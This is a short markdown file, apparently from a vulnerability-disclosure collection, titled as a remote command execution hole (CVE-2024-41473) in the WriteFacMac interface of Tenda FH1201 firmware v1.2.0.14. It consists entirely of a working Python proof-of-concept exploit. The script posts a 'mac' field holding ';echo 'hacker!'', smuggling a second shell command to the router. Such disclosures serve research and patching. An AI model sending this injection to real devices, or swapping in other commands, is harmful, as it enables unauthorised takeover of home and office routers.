Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md

import requests

ip = '192.168.74.145'

url = "http://" + ip + "/goform/WriteFacMac"
payload = ";echo 'hacker!'"

data = {"mac": payload}
response = requests.post(url, data=data)
print(response.text)